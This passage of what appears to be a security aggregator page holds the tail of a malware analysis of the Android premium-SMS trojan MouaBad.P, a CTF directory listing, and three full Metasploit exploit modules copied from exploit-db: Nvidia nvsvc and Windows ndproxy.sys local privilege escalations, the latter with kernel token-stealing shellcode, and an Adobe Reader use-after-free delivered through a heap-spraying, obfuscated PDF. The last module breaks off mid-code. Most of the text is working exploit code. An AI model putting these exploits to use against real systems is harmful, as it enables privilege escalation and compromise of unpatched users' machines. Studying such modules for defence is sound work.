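Given just that manifest, a first-pass triage can already be automated. A toy sketch (my own illustration, not from the Zscaler write-up) that flags the SMS/call/boot combination typical of premium-rate dialers:

MANIFEST = {
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.CALL_PHONE",
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_PHONE_STATE",
}

PREMIUM_DIALER_COMBO = {
    "android.permission.SEND_SMS",               # premium-rate SMS billing
    "android.permission.CALL_PHONE",             # premium-number dialing
    "android.permission.RECEIVE_BOOT_COMPLETED", # restarts itself on boot
}

if PREMIUM_DIALER_COMBO <= MANIFEST:             # subset test
    print("permission set matches a premium-dialer profile")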
Now let's dissect the code.

This application is using telephony services, as shown in the code as well as in the static analysis. You can see the use of premium telephone numbers. In this particular screenshot, you can see functions which use phone services to make calls to premium numbers in order to generate revenue, as the numbers would be controlled by the attackers, who earn a small payment for each call made.

Here you can see that the application is harvesting SIM card information. This application also checks the mobile data and Wi-Fi network status to determine whether Internet connectivity is available. The code includes a hardcoded list of premium telephone numbers, which are all located in China.

In this screenshot you can clearly see that the application also keeps watch on the screen and keyguard status (on/off). This screenshot clearly shows that the application tries to send SMS messages to the premium-rate numbers previously seen in the code. Forcing Android applications to initiate calls to premium phone numbers controlled by the attackers is a common revenue generation scheme, particularly in Android applications distributed in third-party Android app stores.

Here you can see various suspicious function names, such as call, dial, disableDataConnectivity, get call location, etc. These functions suggest that the application is also trying to keep watch on other phone calls. The functions getCallstate, endCall, Call and CancleMissedCallNotification illustrate that the application tries to control phone call services.

The application installs itself silently. Once installed, no icon is observed for this app. Also shown in the previous screenshot is the fact that the application waits for the screen and keyguard events before triggering its malicious activity. It does all of this without user intervention. This allows the malware to function without a suspicious icon on the home screen; that is just one of the techniques malware authors use to hide their presence from the device owner.

From the above screenshots, you can see that the application is using the XML listener service. Also, in the second screenshot, you can see that the application is trying to create a URL by assembling various strings. This is likely command and control (C&C) communication sent to a master server. The parameter &imei denotes the harvesting of the phone's IMEI number for tracking the device.

In conclusion, this malware will defraud the victim by silently forcing the phone to initiate premium-rate SMS billing to generate revenue. The application may also give its author the ability to monitor or control phone calls.

Reference: https://blog.lookout.com/blog/2013/12/09/mouabad-p-pocket-dialing-for-profit/

Posted by viral

Source: Zscaler Research: Dissection of Android malware MouaBad.P
  11. Grehack CTF 2013

Index of /CTF_2013:

MISC/                     16-Nov-2013 03:09
cryptography/             14-Nov-2013 16:21
forensics/                14-Nov-2013 16:21
in_memory_exploitation/   16-Nov-2013 03:36
network/                  16-Nov-2013 03:09
reverse_engineering/      15-Nov-2013 16:52
steganography/            12-Nov-2013 10:58
web/                      16-Nov-2013 03:09
  12. Nvidia (nvsvc) Display Driver Service Local Privilege Escalation

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/post/windows/services'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Services

  def initialize(info={})
    super(update_info(info, {
      'Name'        => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
      'Description' => %q{
        The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
        interact with the service. It contains a stacked based buffer overflow as a result
        of a memmove operation. Note the slight spelling differences: the executable is
        'nvvsvc.exe', the service name is 'nvsvc', and the named pipe is 'nsvr'. This
        exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012,
        and Dec 1 2012. It has been tested on Windows 7 64-bit against nvvsvc.exe dated
        Dec 1 2012.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Peter Wintersmith', # Original exploit
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
        ],
      'Arch'         => ARCH_X86_64,
      'Platform'     => 'win',
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'      =>
        [
          [ 'Windows x64', { } ]
        ],
      'Payload'      =>
        {
          'Space'       => 2048,
          'DisableNops' => true,
          'BadChars'    => "\x00"
        },
      'References'   =>
        [
          [ 'CVE', '2013-0109' ],
          [ 'OSVDB', '88745' ],
          [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
        ],
      'DisclosureDate' => 'Dec 25 2012',
      'DefaultTarget'  => 0
    }))
  end

  def check
    vuln_hashes = [
      '43f91595049de14c4b61d1e76436164f',
      '3947ad5d03e6abcce037801162fdb90d',
      '3341d2c91989bc87c3c0baa97c27253b'
    ]

    os = sysinfo["OS"]

    if os =~ /windows/i
      svc = service_info 'nvsvc'
      if svc and svc['Name'] =~ /NVIDIA/i
        vprint_good("Found service '#{svc['Name']}'")

        begin
          if is_running?
            print_good("Service is running")
          else
            print_error("Service is not running!")
          end
        rescue RuntimeError => e
          print_error("Unable to retrieve service status")
        end

        if sysinfo['Architecture'] =~ /WOW64/i
          path = svc['Command'].gsub('"','').strip
          path.gsub!("system32","sysnative")
        else
          path = svc['Command'].gsub('"','').strip
        end

        begin
          hash = client.fs.file.md5(path).unpack('H*').first
        rescue Rex::Post::Meterpreter::RequestError => e
          print_error("Error checking file hash: #{e}")
          return Exploit::CheckCode::Detected
        end

        if vuln_hashes.include?(hash)
          vprint_good("Hash '#{hash}' is listed as vulnerable")
          return Exploit::CheckCode::Vulnerable
        else
          vprint_status("Hash '#{hash}' is not recorded as vulnerable")
          return Exploit::CheckCode::Detected
        end
      else
        return Exploit::CheckCode::Safe
      end
    end
  end

  def is_running?
    begin
      status = service_status('nvsvc')
      return (status and status[:state] == 4)
    rescue RuntimeError => e
      print_error("Unable to retrieve service status")
      return false
    end
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    end

    print_status("Launching notepad to host the exploit...")
    windir = expand_path("%windir%")
    cmd = "#{windir}\\SysWOW64\\notepad.exe"
    process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
    print_good("Process #{process.pid} launched.")

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-0109", "nvidia_nvsvc.x86.dll")
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid} ...")
    exploit_mem, offset = inject_dll_into_process(host_process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(host_process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status("Payload injected. Executing exploit...")
    host_process.thread.create(exploit_mem + offset, payload_mem)

    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
  end
end

Source: http://www.exploit-db.com/exploits/30393/
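The module fingerprints the service binary by MD5 hash; an even quicker first look is to see whether the weak pipe is reachable at all. A minimal sketch (my own, not part of the module; assumes a Windows host, where Python's os.open maps through CreateFile and so can open named pipes):

import os

PIPE = r"\\.\pipe\nsvr"    # pipe name taken from the module description above

try:
    fd = os.open(PIPE, os.O_RDWR)   # the NULL DACL should let any user in
    os.close(fd)
    print("pipe is present and accessible:", PIPE)
except OSError as exc:
    print("pipe not accessible:", exc)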
  13. Adobe Reader ToolButton Use After Free

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'        => "Adobe Reader ToolButton Use After Free",
      'Description' => %q{
        This module exploits a use after free condition on Adobe Reader versions 11.0.2,
        10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton
        object, where the cEnable callback can be used to early free the object memory.
        Later use of the object allows triggering the use after free condition. This module
        has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and
        Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this
        module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9
        the fileformat version of the exploit can be used.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Soroush Dalili', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'  =>
        [
          [ 'CVE', '2013-3346' ],
          [ 'OSVDB', '96745' ],
          [ 'ZDI', '13-212' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
        ],
      'Platform'    => 'win',
      'Arch'        => ARCH_X86,
      'Payload'     =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00",
          'DisableNops' => true
        },
      'BrowserRequirements' =>
        {
          :source    => /script|headers/i,
          :os_name   => Msf::OperatingSystems::WINDOWS,
          :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,
          :ua_name   => Msf::HttpClients::IE
        },
      'Targets'     =>
        [
          [ 'Windows XP / IE / Adobe Reader 10/11', { } ],
        ],
      'Privileged'  => false,
      'DisclosureDate' => "Aug 08 2013",
      'DefaultTarget'  => 0))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("request: #{request.uri}")
    js_data = make_js(cli, target_info)

    # Create the pdf
    pdf = make_pdf(js_data)

    print_status("Sending PDF...")
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })
  end

  def make_js(cli, target_info)
    # CreateFileMappingA + MapViewOfFile + memcpy rop chain
    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
    escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))

    js = %Q|
    function heapSpray(str, str_addr, r_addr) {
      var aaa = unescape("%u0c0c");
      aaa += aaa;
      while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;
      var i1 = r_addr - 0x24;
      var bbb = aaa.substring(0, i1 / 2);
      var sa = str_addr;
      while (sa.length < (0x0c0c - r_addr)) sa += sa;
      bbb += sa;
      bbb += aaa;
      var i11 = 0x0c0c - 0x24;
      bbb = bbb.substring(0, i11 / 2);
      bbb += str;
      bbb += aaa;
      var i2 = 0x4000 + 0xc000;
      var ccc = bbb.substring(0, i2 / 2);
      while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;
      var i3 = (0x1020 - 0x08) / 2;
      var ddd = ccc.substring(0, 0x80000 - i3);
      var eee = new Array();
      for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
      return;
    }

    var shellcode = unescape("#{escaped_payload}");
    var executable = "";
    var rop10 = unescape("#{rop_10}");
    var rop11 = unescape("#{rop_11}");
    var r11 = false;
    var vulnerable = true;
    var obj_size;
    var rop;
    var ret_addr;
    var rop_addr;
    var r_addr;

    if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
      obj_size = 0x360 + 0x1c;
      rop = rop10;
      rop_addr = unescape("%u08e4%u0c0c");
      r_addr = 0x08e4;
      ret_addr = unescape("%ua8df%u4a82");
    } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
      r11 = true;
      obj_size = 0x370;
      rop = rop11;
      rop_addr = unescape("%u08a8%u0c0c");
      r_addr = 0x08a8;
      ret_addr = unescape("%u8003%u4a84");
    } else {
      vulnerable = false;
    }

    if (vulnerable) {
      var payload = rop + shellcode;
      heapSpray(payload, ret_addr, r_addr);

      var part1 = "";
      if (!r11) {
        for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");
      }
      part1 += rop_addr;
      var part2 = "";
      var part2_len = obj_size - part1.length * 2;
      for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");

      var arr = new Array();

      removeButtonFunc = function () {
        app.removeToolButton({ cName: "evil" });
        for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
      }

      addButtonFunc = function () {
        app.addToolButton({ cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();" });
      }

      app.addToolButton({ cName: "evil", cExec: "1", cEnable: "addButtonFunc();" });
    }
    |

    js
  end

  def RandomNonASCIIString(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  def ioDef(id)
    "%d 0 obj \n" % id
  end

  def ioRef(id)
    "%d 0 R" % id
  end

  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  def nObfu(str)
    #return str
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end

  def ASCIIHexWhitespaceEncode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end

  def make_pdf(js)
    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    pdf << "%" << RandomNonASCIIString(4) << eol

    # catalog
    xref << pdf.length
    pdf << ioDef(1) << nObfu("<<") << eol
    pdf << nObfu("/Pages ") << ioRef(2) << eol
    pdf << nObfu("/Type /Catalog") << eol
    pdf << nObfu("/OpenAction ") << ioRef(4) << eol
    # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load
    pdf << nObfu("/AcroForm ") << ioRef(6) << eol
    pdf << nObfu(">>") << eol
    pdf << endobj

    # pages array
    xref << pdf.length
    pdf << ioDef(2) << nObfu("<<") << eol
    pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol
    pdf << nObfu("/Count 1") << eol
    pdf << nObfu("/Type /Pages") << eol
    pdf << nObfu(">>") << eol
    pdf << endobj

    # page 1
    xref << pdf.length
    pdf << ioDef(3) << nObfu("<<") << eol
    pdf << nObfu("/Parent ") << ioRef(2) << eol
    pdf << nObfu("/Type /Page") << eol
    pdf << nObfu(">>") << eol # end obj dict
    pdf << endobj

    # js action
    xref << pdf.length
    pdf << ioDef(4) << nObfu("<<")
    pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5)
    pdf << nObfu(">>") << eol
    pdf << endobj

    # js stream
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
    pdf << ioDef(5) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    ###
    # The following form related data is required to get icucnv36.dll / icucnv40.dll to load
    ###

    # form object
    xref << pdf.length
    pdf << ioDef(6)
    pdf << nObfu("<</XFA ") << ioRef(7) << nObfu(">>") << eol
    pdf << endobj

    # form stream
    xfa = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
    EOF

    xref << pdf.length
    pdf << ioDef(7) << nObfu("<</Length %s>>" % xfa.length) << eol
    pdf << "stream" << eol
    pdf << xfa << eol
    pdf << "endstream" << eol
    pdf << endobj

    ###
    # end form stuff for icucnv36.dll / icucnv40.dll
    ###

    # trailing stuff
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol
    pdf << "%%EOF" << eol

    pdf
  end
end

=begin

* crash Adobe Reader 10.1.4

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001
eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
AcroRd32_60000000!PDFLTerm+0xbb7cd:
604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????

* crash Adobe Reader 11.0.2

(940.d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000
eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213
AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????

=end

Source: http://www.exploit-db.com/exploits/30394/
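The make_pdf method above is mostly bookkeeping: objects are emitted in order, their byte offsets are recorded, and the xref table and trailer are written from those offsets. A stripped-down sketch of the same skeleton (my own illustration with a benign alert instead of the exploit JavaScript, and no obfuscation, compression or XFA):

js = 'app.alert("JavaScript ran");'

objs = [
    "<</Type /Catalog /Pages 2 0 R /OpenAction 4 0 R>>",
    "<</Type /Pages /Kids [3 0 R] /Count 1>>",
    "<</Type /Page /Parent 2 0 R>>",
    "<</Type /Action /S /JavaScript /JS 5 0 R>>",
    "<</Length %d>>\nstream\n%s\nendstream" % (len(js), js),
]

pdf, offsets = "%PDF-1.5\n", []
for num, body in enumerate(objs, 1):
    offsets.append(len(pdf))                  # byte offset of each object
    pdf += "%d 0 obj\n%s\nendobj\n" % (num, body)

xref_pos = len(pdf)                           # the trailer points back here
pdf += "xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
pdf += "".join("%010d 00000 n \n" % off for off in offsets)
pdf += "trailer\n<</Size %d /Root 1 0 R>>\nstartxref\n%d\n%%%%EOF\n" % (
    len(objs) + 1, xref_pos)

with open("demo.pdf", "w") as f:
    f.write(pdf)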
  14. Microsoft Windows ndproxy.sys Local Privilege Escalation

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info={})
    super(update_info(info, {
      'Name'        => 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
      'Description' => %q{
        This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and
        Windows 2003 SP2 systems, exploited in the wild in November, 2013. The
        vulnerability exists while processing an IO Control Code 0x8fff23c8 or
        0x8fff23cc, where user provided input is used to access an array unsafely, and
        the value is used to perform a call, leading to a NULL pointer dereference which
        is exploitable on both Windows XP and Windows 2003 systems. This module has been
        tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the
        service "Routing and Remote Access" must be running on the target system.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Unknown', # Vulnerability discovery
          'ryujin', # python PoC
          'Shahin Ramezany', # C PoC
          'juan vazquez' # MSF module
        ],
      'Arch'        => ARCH_X86,
      'Platform'    => 'win',
      'Payload'     =>
        {
          'Space' => 4096,
          'DisableNops' => true
        },
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'     =>
        [
          [ 'Automatic', { } ],
          [ 'Windows XP SP3',
            {
              'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
              '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
              '_TOKEN'    => "\xc8", # Offset to TOKEN from the _EPROCESS struct
              '_UPID'     => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct
              '_APLINKS'  => "\x88"  # Offset to ActiveProcessLinks _EPROCESS struct
            }
          ],
          [ 'Windows Server 2003 SP2',
            {
              'HaliQuerySystemInfo' => 0x1fa1e,
              '_KPROCESS' => "\x38",
              '_TOKEN'    => "\xd8",
              '_UPID'     => "\x94",
              '_APLINKS'  => "\x98"
            }
          ]
        ],
      'References'  =>
        [
          [ 'CVE', '2013-5065' ],
          [ 'OSVDB', '100368' ],
          [ 'BID', '63971' ],
          [ 'EDB', '30014' ],
          [ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486' ],
          [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ],
          [ 'URL', 'http://www.secniu.com/blog/?p=53' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ],
          [ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ]
        ],
      'DisclosureDate' => 'Nov 27 2013',
      'DefaultTarget'  => 0
    }))
  end

  def add_railgun_functions
    session.railgun.add_function(
      'ntdll',
      'NtAllocateVirtualMemory',
      'DWORD',
      [
        ["DWORD", "ProcessHandle", "in"],
        ["PBLOB", "BaseAddress", "inout"],
        ["PDWORD", "ZeroBits", "in"],
        ["PBLOB", "RegionSize", "inout"],
        ["DWORD", "AllocationType", "in"],
        ["DWORD", "Protect", "in"]
      ])

    session.railgun.add_function(
      'ntdll',
      'NtDeviceIoControlFile',
      'DWORD',
      [
        [ "DWORD", "FileHandle", "in" ],
        [ "DWORD", "Event", "in" ],
        [ "DWORD", "ApcRoutine", "in" ],
        [ "DWORD", "ApcContext", "in" ],
        [ "PDWORD", "IoStatusBlock", "out" ],
        [ "DWORD", "IoControlCode", "in" ],
        [ "LPVOID", "InputBuffer", "in" ],
        [ "DWORD", "InputBufferLength", "in" ],
        [ "LPVOID", "OutputBuffer", "in" ],
        [ "DWORD", "OutPutBufferLength", "in" ]
      ])

    session.railgun.add_function(
      'ntdll',
      'NtQueryIntervalProfile',
      'DWORD',
      [
        [ "DWORD", "ProfileSource", "in" ],
        [ "PDWORD", "Interval", "out" ]
      ])

    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')

    session.railgun.add_function(
      'psapi',
      'EnumDeviceDrivers',
      'BOOL',
      [
        ["PBLOB", "lpImageBase", "out"],
        ["DWORD", "cb", "in"],
        ["PDWORD", "lpcbNeeded", "out"]
      ])

    session.railgun.add_function(
      'psapi',
      'GetDeviceDriverBaseNameA',
      'DWORD',
      [
        ["LPVOID", "ImageBase", "in"],
        ["PBLOB", "lpBaseName", "out"],
        ["DWORD", "nSize", "in"]
      ])
  end

  def open_device(dev)
    invalid_handle_value = 0xFFFFFFFF

    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
    handle = r['return']

    if handle == invalid_handle_value
      return nil
    end

    return handle
  end

  def find_sys_base(drvname)
    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")

    addresses.each do |address|
      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
      current_drvname = results['lpBaseName'][0..results['return'] - 1]
      if drvname == nil
        if current_drvname.downcase.include?('krnl')
          return [address, current_drvname]
        end
      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
        return [address, current_drvname]
      end
    end

    return nil
  end

  def ring0_shellcode(t)
    restore_ptrs = "\x31\xc0" # xor eax, eax
    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax

    tokenstealing = "\x52" # push edx # Save edx on the stack
    tokenstealing << "\x53" # push ebx # Save ebx on the stack
    tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
    tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
    tokenstealing << "\x8b\xc8" # mov ecx, eax
    tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
    tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
    tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
    tokenstealing << "\x75\xe8" # jne 0000101e ======================
    tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
    tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
    tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
    tokenstealing << "\x5b" # pop ebx # Restores ebx
    tokenstealing << "\x5a" # pop edx # Restores edx
    tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!

    ring0_shellcode = restore_ptrs + tokenstealing
    return ring0_shellcode
  end

  def fill_memory(proc, address, length, content)
    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end

    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    else
      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
    end

    return address
  end

  def create_proc
    windir = expand_path("%windir%")
    cmd = "#{windir}\\System32\\notepad.exe"

    # run hidden
    begin
      proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
    rescue Rex::Post::Meterpreter::RequestError
      # when running from the Adobe Reader sandbox:
      # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
      return nil
    end

    return proc.pid
  end

  def disclose_addresses(t)
    addresses = {}

    vprint_status("Getting the Kernel module name...")
    kernel_info = find_sys_base(nil)
    if kernel_info.nil?
      vprint_error("Failed to disclose the Kernel module name")
      return nil
    end
    vprint_good("Kernel module found: #{kernel_info[1]}")

    vprint_status("Getting a Kernel handle...")
    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
    kernel32_handle = kernel32_handle['return']
    if kernel32_handle == 0
      vprint_error("Failed to get a Kernel handle")
      return nil
    end
    vprint_good("Kernel handle acquired")

    vprint_status("Disclosing the HalDispatchTable...")
    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
    hal_dispatch_table = hal_dispatch_table['return']
    if hal_dispatch_table == 0
      vprint_error("Failed to disclose the HalDispatchTable")
      return nil
    end
    hal_dispatch_table -= kernel32_handle
    hal_dispatch_table += kernel_info[0]
    addresses["halDispatchTable"] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")

    vprint_status("Getting the hal.dll Base Address...")
    hal_info = find_sys_base("hal.dll")
    if hal_info.nil?
      vprint_error("Failed to disclose hal.dll Base Address")
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses["HaliQuerySystemInfo"] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")

    return addresses
  end

  def check
    vprint_status("Adding the railgun stuff...")
    add_railgun_functions

    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Detected
    end

    handle = open_device("\\\\.\\NDProxy")
    if handle.nil?
      return Exploit::CheckCode::Safe
    end

    session.railgun.kernel32.CloseHandle(handle)

    os = sysinfo["OS"]

    case os
    when /windows xp.*service pack 3/i
      return Exploit::CheckCode::Appears
    when /[2003|.net server].*service pack 2/i
      return Exploit::CheckCode::Appears
    when /windows xp/i
      return Exploit::CheckCode::Detected
